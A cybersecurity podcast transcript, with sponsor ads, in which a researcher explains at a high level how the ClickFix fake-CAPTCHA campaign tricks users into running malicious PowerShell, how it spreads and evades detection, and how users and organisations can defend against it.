A

You're listening to the Cyberwire network, powered by N2K. And now a word from our sponsor. The Johns Hopkins University Information Security Institute is seeking qualified applicants for its innovative Master of Science in Security Informatics degree program. Study alongside world class interdisciplinary experts and gain unparalleled educational research and professional experience in information security and assurance. Interested U.S. citizens should consider the Department of Defense's Cyber Service Academy program, which covers tuition, textbooks and a laptop, as well as providing a $34,000 additional annual stipend. Apply for the fall 2026 semester and for this scholarship by February 28th. Learn more at CS JHU. Edu MSSI hello everyone and welcome to the Cyberwires Research Saturday. I'm DAV Dave Bittner and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems, and protecting ourselves in our rapidly evolving cyberspace. Thanks for joining us.

B

This type of attack is trying to fool the visitors of a website to do something that they used to do, like updating their browser in the early phases with a clear fake or in this case solving a captcha. We are so used to do that, so we are doing it once again. But in this case we are being fooled into doing something quite malicious, in this case running the attacker's code on our system.

A

That's Nati tal, head of Guardiolabs. The research we're discussing today is about captchageddon unmasking the viral evolution of the ClickFix browser based threat. Can you walk us through how the attack actually works?

B

Yes. So as you all know, captchas are suddenly popping up on your screen and asking you to solve a puzzle or select where you see the traffic lights or buses and stuff like that. And this one is actually quite the same. You get this capture screen out of the blue. It can be when you enter a new site or just as a pop up, which was the case in early ages of this attack, a pop up from some kind of advertisement and you see this captcha and you say to yourself, okay, I need to solve it. In this case when you click on the Verify your human, you're asked to do something a bit different than usual, which is a bunch of keyword or keyboard shortcuts. You need to click and then you are proving you are a human. But in this case you are actually lured into running this type of code that was copied to your clipboard in the background without you even knowing. And when you click on those buttons you actually open up the run window in Your Windows system, you paste that malicious code into it and press enter to execute it. So you think that everything is okay, but actually you just executed some malicious code that is now going and downloading probably an infosteeler that is now being installed on your system, gathering all the information about you, about your browser, your credentials, your bank accounts, everything, sending it out to the attackers. And that's it. It's all done in a matter of milliseconds actually, and you move on and everything is okay. You didn't even know that this was happening in the background.

A

Help me understand here. When the captcha initially pops up, am I visiting a legitimate website that has been compromised?

B

Interesting question. Because this, the propagation method of this type of attack of attacks evolved during the past year and a half. It started off mostly in what we call malvertising. You enter those websites, content website, mostly on the gray side, gray area of streaming websites or download websites, and you are kind of used to get those annoying new tabs and pop ups with different types of advertisements. And this type of propagation was used by the attackers to pop up a new captcha tab on your system. Instead of some kind of creative about a new product, you suddenly see this captcha. And because you're already visiting a website and you just click on something and you get a captcha, it looks legit in a way because you are used to get a captcha in this, this kind of flow. And this is where it all started. And because getting those type of, types of clicks or pay for them with malvertising is the quick win for the attackers, they pay the bucks and they get visitors clicking on those captchas, they are suddenly popping up on their screens. This is the easy way in. And they kind of use this method to kick it off and to see how effective it is. And because it was so effective, the narrative of a captcha window, they decided in the next evolution of this attack to get out of those more low level advertising websites. Because usually the visitors of those websites are not the most, you know, the best types of victims. They want, they want people with money, people with, you know, with special social accounts they can steal, they want more money eventually. So they moved on to a more robust type of propagation that involves using some more advanced techniques. It's a bit more, I would say, expensive for them to use those kinds of propagations, but at the end they get much more valuable customers for their captchas. And what we saw in the past half a year is their switch from those marvertizing to more malicious Ways of compromising websites, legit websites with many visitors with great search engine ratings. So they usually get to those websites form your search results and many new visitors, and they compromise those websites, mostly WordPress websites. We know about the history of WordPress and compromising websites, unfortunately. And they use these compromise websites to inject their own scripts into the website. So you visit these websites and a few seconds after you start to read their content, captcha is popping up on your screen, which is again, quite usual to see. And you are used to that. And you also trust the website because you know this website, it's legit, it's well known, but you don't know it was compromised. So this is where the captchas brought to a new level of, first of all, you trust them. A new level of trust. The better narrative here because those are real websites and you can even brand this kind of fake captcha with the logo of this website and everything, so it looks totally legit. But eventually to actually read the website, you need to solve this captcha, which means you need to infect your system with malware. In this case, yeah.

A

It strikes me that the brilliance of this, from just a social engineering point of view, is that the captchas are kind of a known and trusted nuisance. We hardly notice them when they pop up and we sort of reflexively click where we need to click and try to move on. So it seems to me like it really is effective in lowering our defenses because we're conditioned to complete them.

B

Exactly. And this is where most of the attackers these days are focusing their efforts on stuff, on flows that are common for us, that are easy to get us distracted with those flows. And captcha is unfortunately a brilliant decision by them because captchas are all around everywhere and so easy to replica to fake them. So this is quite a good narrative to use. And by the way, it's even worse than that because I believe, again, it's not exactly where it all started, but it kind of took more traction once the genuine white hat security community actually presented this kind of attack to the public as a Red Team simulation. Okay. And unfortunately, I love John Hammond, he's a good friend. But for the history, I guess he will be known as the one that presented this fake capture to the world, although it kind of just enhanced it because he already saw this kind of attack in the wild. But since then, most of the attacks were like folks of his GitHub repo. And following that, you know, it became captured.

A

We'll be right back. And now a word from our sponsor, ThreatLocker, the powerful Zero Trust Enterprise Solution that stops ransomware in its tracks. Allowlisting is a deny by default software that makes application control simple and fast. Ring Fencing is an application containment strategy ensuring apps can only access the files, ring registry keys, network resources and other applications they truly need to function. Shut out cyber criminals with world class endpoint protection from Threat Locker. Think your certificate security is covered. By March 2026, TLS certificate lifespans will be cut in half, meaning double today's renewals. And in 2029, certificates will expire every 47 days demanding between 8 and 12 times the renewal volume. That's exponential complexity, operational workload and risk unless you modernize your strategy. Cyberark, proven in identity security, is your partner in certificate security. Cyberark simplifies lifecycle management with visibility, automation and control at scale. Master the 47 day shift with CyberArk. Scan for vulnerabilities, streamline operations, scale Security. Visit cyberark.com 47day that's cyberark.com the numbers 47day. Yeah. I have no doubt that John's intentions were in good faith, but at the same time he does take a lot of heat for having set that free on the world. I'm curious, how widespread is this campaign? Are there particular regions or industries that seem to be targeted?

B

It's quite, it varies because it started off, as I said, mostly in malvertising. In this case it's like spray and pray. You take it all around the world because you know the conversion rate in this case is not high. So you just spray it all over and you get whatever you, you get. But in the last few months, instead of seeing it, you know, with more heats and more kale, you see it in a bit lower scale but more focused and more in high quality instead of just spraying pray with, with advertisements or malvertising. In this case, this concept is being used in more targeted, I guess also targeted victims, but more targeted ecosystems. Just for an example, you see all those WordPress sites being compromised. So those are one way to do that. Other ways are, I would say poison social media with links that eventually take you to this captcha. We even saw some sponsored posts in Facebook about some recipes for cookies or something like that. But the link there goes to a captcha. So if you want the receipt, you need to solve the captcha. And this allows, by the way, the attackers to also use the advanced ad network of Facebook to target specific people. In this case, I don't know cookie lovers, but you can use it of course to any kind of other audience and more. More high valued audience in this case.

A

Right.

B

And we also see this, for example, one of the most targeted audience, I guess, in the past year are users of booking.com in end users, I mean, hotel owners or, you know, or apartment owners that use this service to share their hotels. And those are being targeted with targeted phishing attempts to get their credentials to booking.com and later on use this to target their visitors. So we saw tons and tons of attempts to get those Booking.com clients, but by presenting them some kind of phishing email. But instead of the classic, you know, click here to solve the issue and you have the phishing login page of booking.com Instead, you're going to a site that looks again like booking.com, but you get this captcha instead. So it's even more legit than just trying to log in with your credentials on a fake page. You don't need the credentials, you will just steal everything with the credentials inside. So they're using this more cleverly in the past few months. Less scale a bit, but much more powerful in this case.

A

What about evasion and persistence here? I mean, what sort of tricks are these attackers using to bypass detection?

B

Well, it started quite simply at the beginning of days. It was a plain HTML page with shellcode, the PowerShell code that it copies to your clipboard in plain sight. And everything is so easy to detect. But quite quickly when it got more traction, they started to use those known tricks of obfuscating the code a bit or changing PowerShell with caps and lower letters and everything like that. Really simple, but it works at the beginning of times. Today they are much more persistent with what they are doing because they are actually generating those kinds of scams on the fly. And there are tons of ways to create a malicious PowerShell code, for example, so they are just generating a new one for every hit to the same captcha page. They are also trying to mitigate detection by security companies by redirecting to different kinds of pages along the way and not presenting specifically the code. You are looking for the PowerShell code in this specific page. And again, all those tricks are eventually easy to understand for security researchers and to add to their YARA rules or their detection mechanism. But because it's so powerful, they don't give up and always try to be more creative. So it's a race. Like almost on every other type of attack, it's a race. It will continue forever as long as they are able to get value from this kind of attack. And as we can see it's here for more than a, almost two years now I think from the very first time we saw that and it's here to stay. So we really need to be more careful.

A

Well what are your recommendations then? I mean for both users and organizations, what are the best ways for them to protect themselves?

B

Well, first of all, being familiar with this kind of attack is the most important part of it because again us as more techie users that are used to captchas and know exactly what they're doing, how they are doing that it would be very, I don't know, strange for us to solve a captcha by running code on our system. So we won't do that. But people that are not so aware of this type of captchas they just think oh it's a new type of puzzle we need to solve so let's, let's try it. But if they were aware that this type of attack is here because again the, the flow is the same. You need to open a command line in some way and paste code into it. So it will be there on all types of fake captchas if you are familiar with it. It's the far most important part of mitigating it. But there are more, I don't know, more enterprise ways to deal with it. Of course one of the suggestions we did a few months ago was for organizations mostly to just disable PowerShell on their users computers because most users today don't use PowerShell and of course those that are not coding on their computer so just disable it. It's possible it's one registry key just to change it. Organizations can do that with policy and at least for that you're safe for home users. By the way, it's also a possibility because again most home users don't use PowerShell so it's one way to do that but it's a bit patchy of course and again the most important part of everything here is to get the right security layer for you. It's not enough to use the default security layers we have with our browser or our system. We really need something more powerful, powerful in between that will know to catch those types of attacks before they hit us.

A

Our thanks to Nati Tal from Guardiolabs for joining us. We've been discussing their work on captchageddon unmasking the viral evolution of the click fix browser based threat. We'll have a link to their research in the show notes and that's Research Saturday brought to you by N2K CyberWire we'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like our show, please share a rating and review in your favorite podcast app. Please also fill out the survey in the show notes or send an email to cyberwire2. This episode was produced by Liz Stokes. We're mixed by Elliot Peltzman and Trey Hester. Our executive producer is Jennifer Ibin. Peter Kilpe is our publisher, and I'm Dave Bittner. Thanks for listening. We'll see you back here next time.